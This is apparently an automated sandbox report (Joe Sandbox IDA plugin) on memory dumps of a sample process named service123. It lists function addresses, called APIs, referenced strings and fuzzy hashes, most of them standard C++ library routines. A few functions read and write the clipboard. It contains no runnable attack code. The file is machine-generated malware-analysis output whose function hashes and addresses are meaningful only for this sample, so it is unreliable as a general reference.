Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: db572b71d958cee99246baf7fce82a226e5a87e195b684f2ca69e65378ea57ac
Instruction ID: 164d05e8e1e5d30e30396684d9d7485b21cb0eac94bff79d3cd6ab9d81520bec
Opcode Fuzzy Hash: db572b71d958cee99246baf7fce82a226e5a87e195b684f2ca69e65378ea57ac
Instruction Fuzzy Hash: 1502057154875E8FD710CF28C044795FBE2AF86318F0986AEECB847791C776A44ACB81

Function 6C300FC0 Relevance: 22.6, APIs: 8, Strings: 4, Instructions: 1647stringCOMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C300FCA
strlen.MSVCRT ref: 6C300FD4

Strings

, xrefs: 6C30240F
!, xrefs: 6C302C08
inity, xrefs: 6C301E21
5, xrefs: 6C3014D2

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: localeconvstrlen
String ID: $!$5$inity
API String ID: 186660782-1328200385
Opcode ID: 808f58edaf3ed1be047a6b3bdec394729c8690eeb27c462ea9c5738a29fb0eb6
Instruction ID: 8434b648c8bbe948552dd34c099c45639a2abc1fd08a4520b05156b77fe9ab8e
Opcode Fuzzy Hash: 808f58edaf3ed1be047a6b3bdec394729c8690eeb27c462ea9c5738a29fb0eb6
Instruction Fuzzy Hash: 52F23576A087818FD320CF68C18479BBBE0BF89308F11891EE8D997751D776E8448F92

Function 6C3784D0 Relevance: 17.7, Strings: 14, Instructions: 166COMMON

Download Yara Rule

Strings

Genu, xrefs: 6C3785DF
Auth, xrefs: 6C378676
Auth, xrefs: 6C3785E7
Genu, xrefs: 6C37866E
Auth, xrefs: 6C37854F
rdrand, xrefs: 6C3785A8
rand_s, xrefs: 6C3786B7
default, xrefs: 6C3784EF
random_device::random_device(const std::string&): unsupported token, xrefs: 6C3786D2
hardware, xrefs: 6C3786A0
rdseed, xrefs: 6C378518
random_device::random_device(const std::string&): device not available, xrefs: 6C378598
Genu, xrefs: 6C378557
rdrnd, xrefs: 6C378618

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memcmpstrlen
String ID: Auth$Auth$Auth$Genu$Genu$Genu$default$hardware$rand_s$random_device::random_device(const std::string&): device not available$random_device::random_device(const std::string&): unsupported token$rdrand$rdrnd$rdseed
API String ID: 3108337309-1359127009
Opcode ID: b8ec864605b25d0d3c37d9773245f5896b95a743b9fdc57457fe38317d6f9fd2
Instruction ID: 52d21f73f9a62c5a1967f3504d9e1b4894a9c98d3c1e9983650466000b14bf59
Opcode Fuzzy Hash: b8ec864605b25d0d3c37d9773245f5896b95a743b9fdc57457fe38317d6f9fd2
Instruction Fuzzy Hash: F8414BF26183414BE310AA38C98235A76A6BB4032CF20493ED981ABF51D73AD555CF6B

Function 6C2FEE50 Relevance: 12.5, APIs: 8, Instructions: 494COMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 6C2FF18B
malloc.MSVCRT ref: 6C2FF1A8

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: malloc
String ID:
API String ID: 2803490479-0
Opcode ID: 86eb52e9a939aa9d126713c99f288f2cf72b2b5e276bb1a4210ef22bf4c8ec45
Instruction ID: 292cab1bc147db3dc7841c3af00cbb0bf643d79b5c3fbead5786849a39419efc
Opcode Fuzzy Hash: 86eb52e9a939aa9d126713c99f288f2cf72b2b5e276bb1a4210ef22bf4c8ec45
Instruction Fuzzy Hash: 65124B7564870E8FD311CF18C08061BF7E2BF88718F558A2DE8A997B54D770E90ACB92

Function 6C31E6E0 Relevance: 12.2, APIs: 6, Strings: 2, Instructions: 219stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C31E70A
strlen.MSVCRT ref: 6C31E77A

Strings

basic_string: construction from null is not valid, xrefs: 6C31E742, 6C31E7B2, 6C31E822
basic_string: construction from null is not valid, xrefs: 6C31E86F, 6C31E8C0, 6C31E910

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: strlen
String ID: basic_string: construction from null is not valid$basic_string: construction from null is not valid
API String ID: 39653677-1250104765
Opcode ID: 6696f82a7e49133d35d41625d57467c866f7e28f8672e66e5bb929cfde9e6e73
Instruction ID: a4548d53c3cb3d8804911fb3b7fe7abd8f00f2845190102d6714f4a0cb3ba3a9
Opcode Fuzzy Hash: 6696f82a7e49133d35d41625d57467c866f7e28f8672e66e5bb929cfde9e6e73
Instruction Fuzzy Hash: 046171F2A197148FCB00AF2CD48549ABBE4BB45614F46496DE8C48B715E232E899CFD3

Function 6C309D11 Relevance: 12.0, APIs: 8, Instructions: 46clipboardmemorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C3939D0: strlen.MSVCRT ref: 6C3939DE

OpenClipboard.USER32 ref: 6C309D31
GlobalAlloc.KERNEL32 ref: 6C309D55
GlobalLock.KERNEL32 ref: 6C309D72
strcpy.MSVCRT ref: 6C309D82
GlobalUnlock.KERNEL32 ref: 6C309D8A
EmptyClipboard.USER32 ref: 6C309D93
SetClipboardData.USER32 ref: 6C309DA4
CloseClipboard.USER32 ref: 6C309DAD

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: Clipboard$Global$AllocCloseDataEmptyLockOpenUnlockstrcpystrlen
String ID:
API String ID: 3344633682-0
Opcode ID: e2dd870ef3e57fa86a3e5202f88b2a99edf453524bcf901bb116e300c4af3f66
Instruction ID: a826cacff3d379e4e5bb4905069fc21221ada3886608bc73cb13a309c6feb135
Opcode Fuzzy Hash: e2dd870ef3e57fa86a3e5202f88b2a99edf453524bcf901bb116e300c4af3f66
Instruction Fuzzy Hash: C311B9B1A183058FDB04FFB8C54A26EBBF0AB15305F01482CE4C687A44EB359418CF53

Function 6C310860 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 212stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 6C310886
memcmp.MSVCRT ref: 6C3108A9
memcmp.MSVCRT ref: 6C31091F
memcmp.MSVCRT ref: 6C310991

Part of subcall function 6C3BADB0: strlen.MSVCRT ref: 6C3BADBE

memcmp.MSVCRT ref: 6C310A25

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 6C3108D0, 6C310944, 6C3109B7, 6C310A4C, 6C310A68
basic_string::compare, xrefs: 6C3108C8, 6C31093C, 6C3109AF, 6C310A44, 6C310A60

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 4bc14dfa43eb0390aec89d833d58741feb195a161839c0048de2010aacbe2a71
Instruction ID: eb30ae5d6ab13a159cc56ee3dfa7f053b2631f2e29652b4e8fa5c553cc06acb4
Opcode Fuzzy Hash: 4bc14dfa43eb0390aec89d833d58741feb195a161839c0048de2010aacbe2a71
Instruction Fuzzy Hash: B3610276B097009FC304AF69C9C145EFBE5AB99788F54892DE9C887B20D631D854CF93

Function 6C3070C0 Relevance: 9.6, APIs: 6, Instructions: 649COMMON

Download Yara Rule

APIs

localeconv.MSVCRT ref: 6C3070C7
memset.MSVCRT ref: 6C307217

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: localeconvmemset
String ID:
API String ID: 2367598729-0
Opcode ID: f81cfe452b253c3cee901cfc436a39abdaa96596897aea0aa2f92eae53fa3966
Instruction ID: b0d03df95c16aa40a106d2a7d4e0ceb1c207b13937d2793c039611a135b7c3ae
Opcode Fuzzy Hash: f81cfe452b253c3cee901cfc436a39abdaa96596897aea0aa2f92eae53fa3966
Instruction Fuzzy Hash: 0842B0727093158FD700CF29C48075ABBE2BF86308F15896DE8958BB81D776E949CF92

Function 6C305880 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 1506COMMON

Download Yara Rule

Strings

NaN, xrefs: 6C305B5F
Infinity, xrefs: 6C305BE0
, xrefs: 6C306D95
, xrefs: 6C307074

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: $ $Infinity$NaN
API String ID: 0-3274152445
Opcode ID: d11a60e9d4fd92ef719152553bf63664bbfa27bfea4d861a6903599a9902d3e5
Instruction ID: 20d20ee5a2b6cdca0a4f39b2de454c86bb5dd226b0a55400563766335a6236d5
Opcode Fuzzy Hash: d11a60e9d4fd92ef719152553bf63664bbfa27bfea4d861a6903599a9902d3e5
Instruction Fuzzy Hash: 54E22FB2A097418FD310DF29C18074ABBF0BF89758F14891EE8D997755E776E8848F82

Function 6C309E27 Relevance: 6.0, APIs: 4, Instructions: 38clipboardCOMMON

Download Yara Rule

APIs

GetClipboardData.USER32 ref: 6C309E37
GlobalLock.KERNEL32 ref: 6C309E49
GlobalUnlock.KERNEL32 ref: 6C309E6A
CloseClipboard.USER32 ref: 6C309E73
CloseClipboard.USER32 ref: 6C309E98

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: Clipboard$CloseGlobal$DataLockUnlock
String ID:
API String ID: 3186146249-0
Opcode ID: 56e456ee384bd283adfb364739a441de068d3fa9447438d777252ea4dc6eab1a
Instruction ID: d6e7e8f7a82a5cb11231c2378406126299da0f79dfba8abb2600d6bdb2e28568
Opcode Fuzzy Hash: 56e456ee384bd283adfb364739a441de068d3fa9447438d777252ea4dc6eab1a
Instruction Fuzzy Hash: 54F01DB37086018FEB00BF7895491AEBBF0AB45214F05093DD8C697644EB35D559CF93

Function 00C151B0 Relevance: 6.0, APIs: 1, Strings: 2, Instructions: 1506COMMON

Download Yara Rule

Strings

, xrefs: 00C166C5
, xrefs: 00C169A4

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID:
String ID: $
API String ID: 0-227171996
Opcode ID: 8829f12c720e031bb4b93f58173a2fa5e30a0a78a4b3c9debaa48d12c315bad5
Instruction ID: a77c93d5dc45b6f7504692864750bdd88a58ab021773dcd7cca3310325b959cf
Opcode Fuzzy Hash: 8829f12c720e031bb4b93f58173a2fa5e30a0a78a4b3c9debaa48d12c315bad5
Instruction Fuzzy Hash: C1E231B1A08741CFD710DF29C18079ABBE1BFCA744F14891DE89987361E775E984EB82

Function 00C13E20 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

gfff, xrefs: 00C13F2C
gfff, xrefs: 00C13F43
@, xrefs: 00C13FD9
., xrefs: 00C14114

Memory Dump Source

Source File: 00000005.00000002.2931183608.0000000000C11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C10000, based on PE: true

Associated: 00000005.00000002.2931163525.0000000000C10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931201942.0000000000C1A000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931219875.0000000000C1E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2931236780.0000000000C21000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_c10000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction ID: 8961b38f25c75b1f6b3d2cafb33dc3a7474a319499f5d924af40194ff7194b1b
Opcode Fuzzy Hash: 8459d8207e057e620cf1d9af03855443049108a225ce8fe639410900789573df
Instruction Fuzzy Hash: 28D1F871A083468BC718DF29C48039BBBE2AFD6344F18C92DE8598B345D770DEC5A792

Function 6C3044F0 Relevance: 5.4, Strings: 4, Instructions: 351COMMON

Download Yara Rule

Strings

., xrefs: 6C3047E4
gfff, xrefs: 6C304613
@, xrefs: 6C3046A9
gfff, xrefs: 6C3045FC

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: .$@$gfff$gfff
API String ID: 0-2633265772
Opcode ID: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction ID: 141bd58eac0edfb1b174e63eb536549a82752a01ec4cb5582bf858fca32d1162
Opcode Fuzzy Hash: 8626a3e6e77548aa8c80ec26b31963b047f7067a9e1e968e0f87eb2c543a7be7
Instruction Fuzzy Hash: 60D1D272B083058BD700DE29C58034BB7E2AFD5748F19C92DE8948BB55E772DA49CF92

Function 6C393140 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 137COMMON

Download Yara Rule

Strings

basic_string: construction from null is not valid, xrefs: 6C393250

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID:
String ID: basic_string: construction from null is not valid
API String ID: 0-2991274800
Opcode ID: eb0d0b497f891e28ae3e304d231fd93bd998764618ccd97474f15091193e0193
Instruction ID: 6d77b29befc6db84058470b1f1a7cf66f921b50d5ee8b0f326794a7b76384bbd
Opcode Fuzzy Hash: eb0d0b497f891e28ae3e304d231fd93bd998764618ccd97474f15091193e0193
Instruction Fuzzy Hash: C8416BB2A093108FD714DF69D48065AFBF4EF99314F15C96EE8988B315E331D845CBA2

Function 6C390730 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 6C3907A0
memset.MSVCRT ref: 6C3907C4

Strings

basic_string::_M_replace_aux, xrefs: 6C390840

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memmovememset
String ID: basic_string::_M_replace_aux
API String ID: 1288253900-2536181960
Opcode ID: 65e2e0239ca2c312f912028720ea689faee7d52c0fc7bad4f9522727b5e7992e
Instruction ID: d248f83af91bc7761c3284e2192422948c5de2095b4d52d9d37fcdd1f642cebc
Opcode Fuzzy Hash: 65e2e0239ca2c312f912028720ea689faee7d52c0fc7bad4f9522727b5e7992e
Instruction Fuzzy Hash: 6D315C7560D7908FC7059F28C88062ABFF1AFCA714F14896DE9988B755E632D844CF93

Function 6C363840 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 92COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 6C363898
memcpy.MSVCRT ref: 6C363911

Part of subcall function 6C365590: memcpy.MSVCRT ref: 6C365620

Strings

basic_string::_M_replace_aux, xrefs: 6C3638C0

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: memcpy$memset
String ID: basic_string::_M_replace_aux
API String ID: 438689982-2536181960
Opcode ID: cbf8372fd7102e547623a47cbda1887416121c3cb1f073826a305970dfda2415
Instruction ID: 0a7af4361738396b3bd48279208cf84f2ee11308d2906cbfb25a463b49bee437
Opcode Fuzzy Hash: cbf8372fd7102e547623a47cbda1887416121c3cb1f073826a305970dfda2415
Instruction Fuzzy Hash: 0A215E72A0A3109FC300AF1D988056FFBE4EB89658F94496EE88997716D331D858CF93

Function 6C31A9E0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C31A9FD
wcslen.MSVCRT ref: 6C31AA4D

Strings

basic_string: construction from null is not valid, xrefs: 6C31AA20, 6C31AA70

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: ccc42605702baa6efbe72f6d439c84c72e9ac32dc5557c6432c5a906f4cd9c42
Instruction ID: b159bcc69011e84fbd0bcc89765dc1f65a713ecb0dc84f1c4b9c827fa396ff21
Opcode Fuzzy Hash: ccc42605702baa6efbe72f6d439c84c72e9ac32dc5557c6432c5a906f4cd9c42
Instruction Fuzzy Hash: 991163B2A153148FCB00AF2CD18085ABBF4AF45628F02086DE8C49B311D232DD58CF92

Function 6C31A5F0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 6C31A60D
wcslen.MSVCRT ref: 6C31A65D

Strings

basic_string: construction from null is not valid, xrefs: 6C31A630, 6C31A680

Memory Dump Source

Source File: 00000005.00000002.2931548050.000000006C2F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C2F0000, based on PE: true

Associated: 00000005.00000002.2931529797.000000006C2F0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931660942.000000006C3CD000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931678084.000000006C3CF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931713504.000000006C418000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931730780.000000006C419000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.2931747859.000000006C41C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6c2f0000_service123.jbxd

Similarity

API ID: wcslen
String ID: basic_string: construction from null is not valid
API String ID: 4088430540-2991274800
Opcode ID: ccc42605702baa6efbe72f6d439c84c72e9ac32dc5557c6432c5a906f4cd9c42
Instruction ID: 0ae0ce80f5080865c681278992b7408797872ec9ec448bac2955373473b28827
Opcode Fuzzy Hash: ccc42605702baa6efbe72f6d439c84c72e9ac32dc5557c6432c5a906f4cd9c42
